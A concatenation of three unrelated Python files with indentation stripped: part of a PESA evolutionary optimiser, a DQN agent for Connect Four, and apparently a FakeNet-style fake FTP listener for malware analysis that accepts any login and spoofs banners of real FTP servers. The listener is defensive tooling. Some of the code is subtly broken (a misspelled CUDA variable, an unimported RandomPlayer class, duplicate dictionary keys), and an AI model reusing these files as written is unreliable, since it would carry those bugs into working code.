pso_replay=self.mymemory.sample(batch_size=self.PSO_MEMORY,mode=self.MODE,alpha=self.ALPHA)
for key in self.swm_next:
del self.swm_next[key][3:]
index=self.MU
for sample in range(self.PSO_MEMORY):
self.swm_next[index].append(pso_replay[sample][0])
self.swm_next[index].append(list(self.v0*np.array(pso_replay[sample][0])))
self.swm_next[index].append(pso_replay[sample][1])
self.local_pos_next.append(pso_replay[sample][0])
self.local_fit_next.append(pso_replay[sample][1])
index+=1
#update the dictionary with new samples for DE
de_replay=self.mymemory.sample(batch_size=self.DE_MEMORY,mode=self.MODE,alpha=self.ALPHA)
index=self.MU
for sample in range(self.DE_MEMORY):
self.de_next[index].append(de_replay[sample][0])
self.de_next[index].append(de_replay[sample][1])
index+=1
self.de_next=[self.de_next[item][0] for item in self.de_next]
def init_guess(self, pop0):
#"""
#This function takes initial guess pop0 and returns initial guesses for SA, PSO, and ES
#to start PESA evolution
#inputs:
# pop0 (dict): dictionary contains initial population to start with for all methods
#returns:
# espop0 (dict): initial population for ES
# swarm0 (dict): initial swarm for PSO
# swm_pos (list), swm_fit (float): initial guess for swarm best position and fitness for PSO
# local_pos (list of lists), local_fit (list): initial guesses for local best position of each particle and their fitness for PSO
# x0 (list of lists), E0 (list): initial input vectors and their initial fitness for SA
#"""
pop0=list(pop0.items())
pop0.sort(key=lambda e: e[1][2], reverse=True)
sorted_de=dict(pop0[:self.NPOP])
x0_de, fit0_de=[sorted_de[key][0] for key in sorted_de], [sorted_de[key][2] for key in sorted_de] # initial guess for DE
#sorted_pso=dict(sorted(pop0.items(), key=lambda e: e[1][2], reverse=True)[:self.NPAR]) # sort the initial samples for PSO
#sorted_es=dict(sorted(pop0.items(), key=lambda e: e[1][2], reverse=True)[:self.LAMBDA]) # sort the initial samples for ES
sorted_pso=dict(pop0[:self.NPAR])
sorted_es=dict(pop0[:self.LAMBDA])
swarm0=defaultdict(list)
espop0=defaultdict(list)
local_pos=[]
local_fit=[]
index=0
for key in sorted_pso:
swarm0[index].append(sorted_pso[key][0])
swarm0[index].append(list(self.v0*np.array(sorted_pso[key][0])))
swarm0[index].append(sorted_pso[key][2])
local_pos.append(sorted_pso[key][0])
local_fit.append(sorted_pso[key][2])
index+=1
swm_pos=swarm0[0][0]
swm_fit=swarm0[0][2]
index=0
for key in sorted_es:
espop0[index].append(sorted_es[key][0])
espop0[index].append(sorted_es[key][1])
espop0[index].append(sorted_es[key][2])
index+=1
return espop0, swarm0, swm_pos, swm_fit, local_pos, local_fit, x0_de, fit0_de
def printout(self, mode, gen):
#"""
#Print statistics to screen
#inputs:
# mode (int): 1 to print for individual algorathims and 2 to print for PESA
# gen (int): current generation number
#"""
if mode == 1:
print('***********************************************************************************************')
print('############################################################')
print('ES step {}/{}, CX={}, MUT={}, MU={}, LAMBDA={}'.format(self.STEP0-1,self.STEPS, np.round(self.CXPB,2), np.round(self.MUTPB,2), self.MU, self.LAMBDA))
print('############################################################')
print('Statistics for generation {}'.format(gen))
print('Best Fitness:', np.round(np.max(self.rwd),4) if self.mode is 'max' else -np.round(np.max(self.rwd),4))
print('Max Strategy:', np.round(np.max(self.mean_strategy),3))
print('Min Strategy:', np.round(np.min(self.mean_strategy),3))
print('Average Strategy:', np.round(np.mean(self.mean_strategy),3))
print('############################################################')
print('*****************************************************************************')
print('DE step {}/{}, NPOP={}, F={}, CR={}'.format(self.STEP0-1,self.STEPS,self.NPOP,np.round(self.F), self.CR))
print('****************************************************************************')
print('Statistics for generation {}'.format(gen))
print('Best Individual Fitness:', np.round(np.max(self.yde_best),4) if self.mode is 'max' else -np.round(np.max(self.yde_best),4))
print('Best Individual Position:', np.round(self.de_best),3)
print('****************************************************************************')
if self.pso_flag:
print('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')
print('PSO step {}/{}, C1={}, C2={}, Particles={}'.format(self.STEP0-1,self.STEPS, np.round(self.C1,2), np.round(self.C2,2), self.NPAR))
print('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')
print('Statistics for generation {}'.format(gen))
print('Best Swarm Fitness:', np.round(self.swm_fit,4) if self.mode is 'max' else -np.round(self.swm_fit,4))
print('Best Swarm Position:', np.round(self.swm_pos,2))
print('Max Speed:', np.round(np.max(self.mean_speed),3))
print('Min Speed:', np.round(np.min(self.mean_speed),3))
print('Average Speed:', np.round(np.mean(self.mean_speed),3))
print('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')
if mode == 2:
print('------------------------------------------------------------')
print('PESA step {}/{}'.format(self.STEP0-1,self.STEPS))
print('------------------------------------------------------------')
print('PESA statistics for generation {}'.format(gen))
print('Best Fitness:', self.pesa_best[1] if self.mode is 'max' else -self.pesa_best[1])
print('Best Individual:', np.round(self.pesa_best[0],2))
print('ALPHA:', np.round(self.ALPHA,3))
print('Memory Size:', self.memory_size)
print('------------------------------------------------------------')
print('***********************************************************************************************') |
sample_nn.py | import os
from operator import itemgetter
# Comment next line to run on GPU. With this configuration, it looks to run faster on CPU i7-8650U
os.environ['CUDA_VISIBLE_D5EVICES'] = '-1'
import random
import warnings
import gym
from keras.layers import Dense, Flatten
from keras.models import Sequential
from keras.optimizers import Adam
from gym_connect_four import ConnectFourEnv, Player, ResultType, SavedPlayer
ENV_NAME = "ConnectFour-v0"
TRAIN_EPISODES = 100000
import threading
import time
from statistics import mean
import matplotlib
from plotly.subplots import make_subplots
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from collections import deque
import os
import csv
import numpy as np
import pandas as pd
from plotly import graph_objects as go
SCORES_CSV_PATH = "./scores/scores.csv"
SCORES_PNG_PATH = "./scores/scores.png"
SOLVED_CSV_PATH = "./scores/solved.csv"
SOLVED_PNG_PATH = "./scores/solved.png"
AVERAGE_SCORE_TO_SOLVE = 195
CONSECUTIVE_RUNS_TO_SOLVE = 200
PLOT_REFRESH = 50
class ScoreLogger:
def __init__(self, env_name, success_rounds=20):
self.scores = deque(maxlen=CONSECUTIVE_RUNS_TO_SOLVE)
self.averages = deque(maxlen=CONSECUTIVE_RUNS_TO_SOLVE)
self.last_20_avg = deque(maxlen=CONSECUTIVE_RUNS_TO_SOLVE)
self._N = success_rounds
self.last20_scores = deque(maxlen=success_rounds)
self.exp_rates = deque(maxlen=CONSECUTIVE_RUNS_TO_SOLVE)
self.time_hist = deque(maxlen=CONSECUTIVE_RUNS_TO_SOLVE)
self.t1 = time.time()
self.env_name = env_name
if os.path.exists(SCORES_PNG_PATH):
os.remove(SCORES_PNG_PATH)
if os.path.exists(SCORES_CSV_PATH):
os.remove(SCORES_CSV_PATH)
def show_graph(self, y: pd.DataFrame):
self.fig = make_subplots(specs=[[{"secondary_y": True}]])
self.fig.add_trace(go.Scatter(x=y.index, y=y.score, name="score"))
self.fig.add_trace(go.Scatter(x=y.index, y=y.m, name="mean"))
self.fig.add_trace(go.Scatter(x=y.index, y=y.m20, name=f"mean_last{self._N}"))
self.fig.add_trace(go.Scatter(x=y.index, y=y.expl, name="expl"))
self.fig.add_trace(go.Scatter(x=y.index, y=y.time, name="time"), secondary_y=True)
self.fig.show()
def add_score(self, score: int, run: int, exploration_rate: float, memory_size: int, refresh=False):
self._save_csv(SCORES_CSV_PATH, score)
self._save_png(input_path=SCORES_CSV_PATH,
output_path=SCORES_PNG_PATH,
x_label="runs",
y_label="scores",
average_of_n_last=CONSECUTIVE_RUNS_TO_SOLVE,
show_goal=True,
show_trend=True,
show_legend=True)
self.scores.append(score)
self.last20_scores.append(score)
last_20mean = mean(self.last20_scores)
self.last_20_avg.append(last_20mean)
mean_score = mean(self.scores)
self.averages.append(mean_score)
self.exp_rates.append(exploration_rate)
td = time.time() - self.t1
self.time_hist.append(td)
if refresh:
# Here we start a new thread as because of a bug in Plotly, sometimes the fig.show() doesn't return at all and process freezes
y = pd.DataFrame(zip(self.scores, self.averages, self.last_20_avg, self.exp_rates, self.time_hist),
columns=['score', 'm', 'm20', 'expl', 'time'])
threading.Thread(target=self.show_graph, args=(y,)).start()
print(f"Run {run:3}: (avg: {mean_score:2.3f}, last{self._N}_avg: {last_20mean:2.3f}, expl: {exploration_rate:1.3}, "
f"mem_sz: {memory_size!s}, time: {td:3.1})\n")
if mean_score >= AVERAGE_SCORE_TO_SOLVE and len(self.scores) >= CONSECUTIVE_RUNS_TO_SOLVE:
solve_score = run - CONSECUTIVE_RUNS_TO_SOLVE
print("Solved in " + str(solve_score) + " runs, " + str(run) + " total runs.")
self._save_csv(SOLVED_CSV_PATH, solve_score)
self._save_png(input_path=SOLVED_CSV_PATH,
output_path=SOLVED_PNG_PATH,
x_label="trials",
y_label="steps before solve",
average_of_n_last=None,
show_goal=False,
show_trend=False,
show_legend=False)
exit()
def _save_png(self, input_path, output_path, x_label, y_label, average_of_n_last, show_goal, show_trend, show_legend):
x = []
y = []
with open(input_path, "r") as scores:
reader = csv.reader(scores)
data = list(reader)
j = 0
for i in range(0, len(data)):
if len(data[i]) == 0:
continue
x.append(int(j))
y.append(int(data[i][0]))
j += 1
plt.subplots()
plt.plot(x, y, label="score per run")
average_range = average_of_n_last if average_of_n_last is not None else len(x)
plt.plot(x[-average_range:], [np.mean(y[-average_range:])] * len(y[-average_range:]), linestyle="--",
label="last " + str(average_range) + " runs average")
if show_goal:
plt.plot(x, [AVERAGE_SCORE_TO_SOLVE] * len(x), linestyle=":", label=str(AVERAGE_SCORE_TO_SOLVE) + " score average goal")
if show_trend and len(x) > 1:
trend_x = x[1:]
z = np.polyfit(np.array(trend_x), np.array(y[1:]), 1)
p = np.poly1d(z)
plt.plot(trend_x, p(trend_x), linestyle="-.", label="trend")
plt.title(self.env_name)
plt.xlabel(x_label)
plt.ylabel(y_label)
if show_legend:
plt.legend(loc="upper left")
plt.savefig(output_path, bbox_inches="tight")
plt.close()
def _save_csv(self, path, score):
if not os.path.exists(path):
with open(path, "w"):
pass
scores_file = open(path, "a")
with scores_file:
writer = csv.writer(scores_file)
writer.writerow([score])
class DQNSolver:
"""
Vanilla Multi Layer Perceptron version
"""
def __init__(self, observation_space, action_space):
self.GAMMA = 0.95
self.LEARNING_RATE = 0.001
self.MEMORY_SIZE = 512
self.BATCH_SIZE = 32
self.EXPLORATION_MAX = 1.0
self.EXPLORATION_MIN = 0.0
self.EXPLORATION_DECAY = 0.995
self.exploration_rate = self.EXPLORATION_MAX
self.isFit = False
self.action_space = action_space
self.memory = deque(maxlen=self.MEMORY_SIZE)
obs_space_card = observation_space[0] * observation_space[1]
self.model = Sequential()
self.model.add(Flatten(input_shape=observation_space))
self.model.add(Dense(obs_space_card * 2, activation="relu"))
self.model.add(Dense(obs_space_card * 2, activation="relu"))
self.model.add(Dense(obs_space_card * 2, activation="relu"))
self.model.add(Dense(obs_space_card * 2, activation="relu"))
self.model.add(Dense(self.action_space, activation="linear"))
self.model.compile(loss="mse", optimizer=Adam(lr=self.LEARNING_RATE))
def remember(self, state, action, reward, next_state, done):
self.memory.append((state, action, reward, next_state, done))
def act(self, state, available_moves):
if np.random.rand() < self.exploration_rate:
return random.choice(list(available_moves))
q_values = self.model.predict(state)[0]
vs = [(i, q_values[i]) for i in available_moves]
act = max(vs, key=itemgetter(1))
return act[0]
def experience_replay(self):
if self.isFit:
self.exploration_rate *= self.EXPLORATION_DECAY
self.exploration_rate = max(self.EXPLORATION_MIN, self.exploration_rate)
if len(self.memory) < self.BATCH_SIZE:
return
batch = random.sample(self.memory, self.BATCH_SIZE)
batch[-1] = self.memory[-1]
if self.BATCH_SIZE > 1:
batch[-2] = self.memory[-1]
if not self.isFit:
states = list(map(lambda _: _[0][0], batch))
states = np.array(states)
self.model.fit(states, np.zeros((len(batch), self.action_space)), verbose=0)
for state, action, reward, state_next, terminal in batch:
q_update = reward
if not terminal:
q_update = (reward + self.GAMMA * np.amax(self.model.predict(state_next)[0]))
q_values = self.model.predict(state)
q_values[0][action] = q_update
self.model.fit(state, q_values, verbose=0)
self.isFit = True
def save_model(self, file_prefix: str):
self.model.save(f"{file_prefix}.h5")
class NNPlayer(Player):
def __init__(self, env, name='RandomPlayer'):
super(NNPlayer, self).__init__(env, name)
self.observation_space = env.observation_space.shape
self.action_space = env.action_space.n
self.dqn_solver = DQNSolver(self.observation_space, self.action_space)
self._N = 30
self.sl = ScoreLogger(str(self.__class__), success_rounds=self._N)
self._STOP_THRESHOLD = 0.8 # 0.86- with RP
self._last_N_rounds = deque(maxlen=self._N)
self._round = 0
self._score = 0
self._total_score = 0
self._max_avg_score = -100
def get_next_action(self, state: np.ndarray) -> int:
state = np.reshape(state, [1] + list(self.observation_space))
action = self.dqn_solver.act(state, self.env.available_moves())
if self.env.is_valid_action(action):
return action
def _stop_learn_condition(self):
if len(self._last_N_rounds) < self._N:
return False
avg = mean(self._last_N_rounds)
if avg > self._max_avg_score:
self.save_model()
self._max_avg_score = avg
print(f"\n---------------New max_score {avg}. Saving model.")
return avg >= self._STOP_THRESHOLD
def learn(self, state, action, state_next, reward, done) -> None:
if self._stop_learn_condition():
print(f"Stopping learning as got {mean(self._last_N_rounds)} avg on last{self._N}. Saving model & exiting")
self.save_model()
exit()
state = np.reshape(state, [1] + list(self.observation_space))
state_next = np.reshape(state_next, [1] + list(self.observation_space))
# reward = reward if not done else -reward
self.dqn_solver.remember(state, action, reward, state_next, done)
self.dqn_solver.experience_replay()
if done:
self._last_N_rounds.append(int(reward))
self._round += 1
self._total_score += int(reward)
self.sl.add_score(int(reward), self._round, self.dqn_solver.exploration_rate, len(self.dqn_solver.memory),
refresh=self._round % PLOT_REFRESH == 0)
def save_model(self):
self.dqn_solver.save_model(self.name)
def game(show_boards=False):
env: ConnectFourEnv = gym.make(ENV_NAME)
player = NNPlayer(env, 'NNPlayer')
opponent = RandomPlayer(env, 'OpponentRandomPlayer')
players = [player, opponent]
total_reward = 0
wins = 0
losses = 0
draws = 0
for run in range(1, TRAIN_EPISODES + 1):
random.shuffle(players)
result = env.run(*players, board=None, render=False)
reward = result.value
total_reward += reward
wins += max(0, result.value)
losses += max(0, -result.value)
draws += (abs(result.value) + 1) % 2
if show_boards:
print("Run: " + str(run) + ", score: " + str(reward))
if hasattr(player, 'dqn_solver'):
print("exploration: " + str(player.dqn_solver.exploration_rate))
if result == ResultType.WIN1:
print(f"winner: {player.name}")
print("board state:\n", env.board)
print(f"reward={reward}")
elif result == ResultType.WIN2:
print(f"lost to: {opponent.name}")
print("board state:\n", env.board)
print(f"reward={reward}")
elif result == ResultType.DRAW:
print(f"draw after {player.name} move")
print("board state:\n", env.board)
print(f"reward={reward}")
else:
raise ValueError("Unknown result type")
print(
f"Wins [{wins}], Draws [{draws}], Losses [{losses}] - Total reward {total_reward}, average reward {total_reward / TRAIN_EPISODES}")
player.save_model()
if __name__ == "__main__":
with warnings.catch_warnings():
warnings.simplefilter("ignore")
game(False)
|
FTPListener.py | import logging
import os
import sys
import threading
import SocketServer
import ssl
import socket
from . import *
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler, TLS_FTPHandler
from pyftpdlib.filesystems import AbstractedFS
from pyftpdlib.servers import ThreadedFTPServer
import BannerFactory
FAKEUSER = 'FAKEUSER'
FAKEPWD = 'FAKEPWD'
EXT_FILE_RESPONSE = {
'.html': u'FakeNet.html',
'.png' : u'FakeNet.png',
'.ico' : u'FakeNet.ico',
'.jpeg': u'FakeNet.jpg',
'.exe' : u'FakeNetMini.exe',
'.pdf' : u'FakeNet.pdf',
'.xml' : u'FakeNet.html',
'.txt' : u'FakeNet.txt',
}
# Adapted from various sources including https://github.com/turbo/openftp4
BANNERS = {
'generic': '{servername} FTP Server',
'ncftpd': '{servername} NcFTPD Server (licensed copy) ready.',
'unspec1': lambda hostname: 'FTP server ready',
'unspec2': lambda hostname: 'FTP server ready %s',
'iis': lambda hostname: '%s Microsoft FTP Service',
'iis': lambda hostname: '%s Microsoft FTP Service',
'iis-3.0': lambda hostname: '%s Microsoft FTP Service (Version 3.0)',
'iis-4.0': lambda hostname: '%s Microsoft FTP Service (Version 4.0)',
'iis-5.0': lambda hostname: '%s Microsoft FTP Service (Version 5.0)',
'iis-6.0': lambda hostname: '%s Microsoft FTP Service (Version 6.0)',
'vs-2.0.7': lambda hostname: '(vsFTPd 2.0.7)',
'vs-2.1.0': lambda hostname: '(vsFTPd 2.1.0)',
'vs-2.1.2': lambda hostname: '(vsFTPd 2.1.2)',
'vs-2.1.2': lambda hostname: '(vsFTPd 2.1.2)',
'vs-2.2.0': lambda hostname: '(vsFTPd 2.2.0)',
'vs-2.2.1': lambda hostname: '(vsFTPd 2.2.1)',
'vs-2.2.2': lambda hostname: '(vsFTPd 2.2.2)',
'vs-2.3.0': lambda hostname: '(vsFTPd 2.3.0)',
'vs-2.3.1': lambda hostname: '(vsFTPd 2.3.1)',
'vs-2.3.2': lambda hostname: '(vsFTPd 2.3.2)',
'vs-2.3.4': lambda hostname: '(vsFTPd 2.3.4)',
'vs-2.3.5': lambda hostname: '(vsFTPd 2.3.5)',
'wu-2.4(1)': '{servername} (Version wu-2.4(1) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.4(2)': '{servername} (Version wu-2.4(2) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.4(20)': '{servername} (Version wu-2.4(20) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.4.2-academ(1)': '{servername} (Version wu-2.4.2-academ (1) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.4.2-academ[BETA-15](1)': '{servername} (Version wu-2.4.2-academ[BETA-15](1) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.4.2-academ[BETA-16](1)': '{servername} (Version wu-2.4.2-academ[BETA-16](1) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.4.2-academ[BETA-18](1)': '{servername} (Version wu-2.4.2-academ[BETA-18](1) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.4.2-academ[BETA-9](1)': '{servername} (Version wu-2.4.2-academ[BETA-9](1) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.4.2-VR16(1)': '{servername} (Version wu-2.4.2-VR16(1) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.4.2-VR17(1)': '{servername} (Version wu-2.4.2-VR17(1) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.4(3)': '{servername} (Version wu-2.4(3) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.4(4)': '{servername} (Version wu-2.4(4) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.4(6)': '{servername} (Version wu-2.4(6) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.5.0(1)': '{servername} (Version wu-2.5.0(1) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.0(1)': '{servername} (Version wu-2.6.0(1) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.0(2)': '{servername} (Version wu-2.6.0(2) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.0(4)': '{servername} (Version wu-2.6.0(4) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.0(5)': '{servername} (Version wu-2.6.0(5) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.0(7)': '{servername} (Version wu-2.6.0(7) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.1-0.6x.21': '{servername} (Version wu-2.6.1-0.6x.21 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.1(1)': '{servername} (Version wu-2.6.1(1) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.1(12)': '{servername} (Version wu-2.6.1(12) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.1-16': '{servername} (Version wu-2.6.1-16 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.1-16.7x.1': '{servername} (Version wu-2.6.1-16.7x.1 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.1-18': '{servername} (Version wu-2.6.1-18 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.1(2)': '{servername} (Version wu-2.6.1(2) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.1-20': '{servername} (Version wu-2.6.1-20 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.1-21': '{servername} (Version wu-2.6.1-21 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.1-23.2': '{servername} (Version wu-2.6.1-23.2 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.1-24': '{servername} (Version wu-2.6.1-24 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.1-24.1': '{servername} (Version wu-2.6.1-24.1 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.1(3)': '{servername} (Version wu-2.6.1(3) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2(1)': '{servername} (Version wu-2.6.2(1) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2(11)': '{servername} (Version wu-2.6.2(11) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2-11.1204.1ubuntu': '{servername} (Version wu-2.6.2-11.1204.1ubuntu %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2-11.71.1': '{servername} (Version wu-2.6.2-11.71.1 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2-11.72.1': '{servername} (Version wu-2.6.2-11.72.1 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2-11.73.1': '{servername} (Version wu-2.6.2-11.73.1 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2-11.73.1mdk': '{servername} (Version wu-2.6.2-11.73.1mdk %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2-12': '{servername} (Version wu-2.6.2-12 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2-12.1.co5.PROX': '{servername} (Version wu-2.6.2-12.1.co5.PROX %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2-12.rhel2': '{servername} (Version wu-2.6.2-12.rhel2 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2(13)': '{servername} (Version wu-2.6.2(13) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2.1(5)': '{servername} (Version wu-2.6.2.1(5) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2(15)': '{servername} (Version wu-2.6.2(15) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2-15.7x.legacy': '{servername} (Version wu-2.6.2-15.7x.legacy %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2-15.7x.PROX': '{servername} (Version wu-2.6.2-15.7x.PROX %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2(16)': '{servername} (Version wu-2.6.2(16) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2(2)': '{servername} (Version wu-2.6.2(2) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2(3)': '{servername} (Version wu-2.6.2(3) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2(4)': '{servername} (Version wu-2.6.2(4) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2-468': '{servername} (Version wu-2.6.2-468 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2(47)': '{servername} (Version wu-2.6.2(47) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2(48)': '{servername} (Version wu-2.6.2(48) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2-5': '{servername} (Version wu-2.6.2-5 %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2(5)': '{servername} (Version wu-2.6.2(5) %a %b %d %H:%M:%S {tz} %Y) ready.',
'wu-2.6.2(52)': '{servername} (Version wu-2.6.2(52) %a %b %d %H:%M:%S {tz} %Y) ready.',
'ws_ftp-2.0.4': '{servername} V2 WS_FTP Server 2.0.4 (0)',
'ws_ftp-3.1.3': '{servername} V2 WS_FTP Server 3.1.3 (0)',
'ws_ftp-5.0.5': '{servername} V2 WS_FTP Server 5.0.5 (0)',
'ws_ftp-7.5.1': '{servername} V2 WS_FTP Server 7.5.1(0)',
'ws_ftp-7.7': '{servername} V2 WS_FTP Server 7.7(0)',
'ws_ftp-1.0.3 ': '{servername} X2 WS_FTP Server 1.0.3 (0)',
'ws_ftp-1.0.5 ': '{servername} X2 WS_FTP Server 1.0.5 (0)',
'ws_ftp-2.0.0 ': '{servername} X2 WS_FTP Server 2.0.0 (0)',
'ws_ftp-2.0.3 ': '{servername} X2 WS_FTP Server 2.0.3 (0)',
'ws_ftp-3.00 ': '{servername} X2 WS_FTP Server 3.00 (0)',
'ws_ftp-3.1.3 ': '{servername} X2 WS_FTP Server 3.1.3 (0)',
'ws_ftp-4.0.0 ': '{servername} X2 WS_FTP Server 4.0.0 (0)',
'ws_ftp-4.0.2 ': '{servername} X2 WS_FTP Server 4.0.2 (0)',
'ws_ftp-5.0.0 ': '{servername} X2 WS_FTP Server 5.0.0 (0)',
'ws_ftp-5.0.2 ': '{servername} X2 WS_FTP Server 5.0.2 (0)',
'ws_ftp-5.0.4 ': '{servername} X2 WS_FTP Server 5.0.4 (0)',
'ws_ftp-5.0.5 ': '{servername} X2 WS_FTP Server 5.0.5 (0)',
'ws_ftp-6.0': '{servername} X2 WS_FTP Server 6.0(0)',
'ws_ftp-6.1': '{servername} X2 WS_FTP Server 6.1(0)',
'ws_ftp-6.1.1': '{servername} X2 WS_FTP Server 6.1.1(0)',
'ws_ftp-7.0': '{servername} X2 WS_FTP Server 7.0(0)',
'ws_ftp-7.1': '{servername} X2 WS_FTP Server 7.1(0)',
'ws_ftp-7.5': '{servername} X2 WS_FTP Server 7.5(0)',
'ws_ftp-7.5.1': '{servername} X2 WS_FTP Server 7.5.1(0)',
'ws_ftp-7.6': '{servername} X2 WS_FTP Server 7.6(0)',
'ws_ftp-7.6': '{servername} X2 WS_FTP Server 7.6(0) FIPS',
'ws_ftp-7.6.2': '{servername} X2 WS_FTP Server 7.6.2(0)',
'ws_ftp-7.6.2-fips': '{servername} X2 WS_FTP Server 7.6.2(0) FIPS',
'ws_ftp-7.6.3': '{servername} X2 WS_FTP Server 7.6.3(0)',
'ws_ftp-7.7': '{servername} X2 WS_FTP Server 7.7(0)',
}
class FakeFTPHandler(FTPHandler, object):
def ftp_PASS(self, line):
# Dynamically add user to authorizer
if not self.authorizer.has_user(self.username):
self.authorizer.add_user(self.username, line, self.ftproot_path, 'elradfmwM')
return super(FakeFTPHandler, self).ftp_PASS(line)
class TLS_FakeFTPHandler(TLS_FTPHandler, object):
def ftp_PASS(self, line):
# Dynamically add user to authorizer
if not self.authorizer.has_user(self.username):
self.authorizer.add_user(self.username, line, self.ftproot_path, 'elradfmwM')
return super(TLS_FakeFTPHandler, self).ftp_PASS(line)
class FakeFS(AbstractedFS):
def open(self, filename, mode):
# If virtual filename does not exist return a default file based on extention
if not self.lexists(filename):
file_basename, file_extension = os.path.splitext(filename)
# Calculate absolute path to a fake file
filename = os.path.join(os.path.dirname(filename), EXT_FILE_RESPONSE.get(file_extension.lower(), u'FakeNetMini.exe'))
return super(FakeFS, self).open(filename, mode)
def chdir(self, path):
# If virtual directory does not exist change to the current directory
if not self.lexists(path):
path = u'.'
return super(FakeFS, self).chdir(path)
def remove(self, path):
# Don't remove anything
pass
def rmdir(self, path):
# Don't remove anything
pass
class FTPListener(object):
def taste(self, data, dport):
# See RFC5797 for full command list. Many of these commands are not likely
# to be used but are included in case malware uses FTP in unexpected ways
base_ftp_commands = [
'abor', 'acct', 'allo', 'appe', 'cwd', 'dele', 'help', 'list', 'mode',
'nlst', 'noop', 'pass', 'pasv', 'port', 'quit', 'rein', 'rest', 'retr',
'rnfr', 'rnto', 'site', 'stat', 'stor', 'stru', 'type', 'user'
]
opt_ftp_commands = [
'cdup', 'mkd', 'pwd', 'rmd', 'smnt', 'stou', 'syst'
]
confidence = 1 if dport == 21 else 0
data = data.lstrip().lower()
for command in base_ftp_commands + opt_ftp_commands:
if data.startswith(command):
return confidence + 1
return confidence
def __init__(self,
config,
name='FTPListener',
logging_level=logging.INFO,
running_listeners=None,
diverter=None
):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.name = name
self.local_ip = config.get('ipaddr')
self.server = None
self.running_listeners = running_listeners
self.diverter = diverter
self.name = 'FTP'
self.port = self.config.get('port', 21)
self.logger.debug('Starting...')
self.logger.debug('Initialized with config:')
for key, value in config.iteritems():
self.logger.debug(' %10s: %s', key, value)
# Initialize ftproot directory
path = self.config.get('ftproot','defaultFiles')
self.ftproot_path = ListenerBase.abs_config_path(path)
if self.ftproot_path is None:
self.logger.error('Could not locate ftproot directory: %s', path)
sys.exit(1)
def expand_ports(self, ports_list):
ports = []
for i in ports_list.split(','):
if '-' not in i:
ports.append(int(i))
else:
l,h = map(int, i.split('-'))
ports+= range(l,h+1)
return ports
def start(self):
self.authorizer = DummyAuthorizer()
if self.config.get('usessl') == 'Yes':
self.logger.debug('Using SSL socket.')
keyfile_path = 'listeners/ssl_utils/privkey.pem'
keyfile_path = ListenerBase.abs_config_path(keyfile_path)
if keyfile_path is None:
self.logger.error('Could not locate %s', keyfile_path)
sys.exit(1)
self.handler = TLS_FakeFTPHandler
self.handler.certfile = keyfile_path
else:
self.handler = FakeFTPHandler
self.handler.banner = self.genBanner()
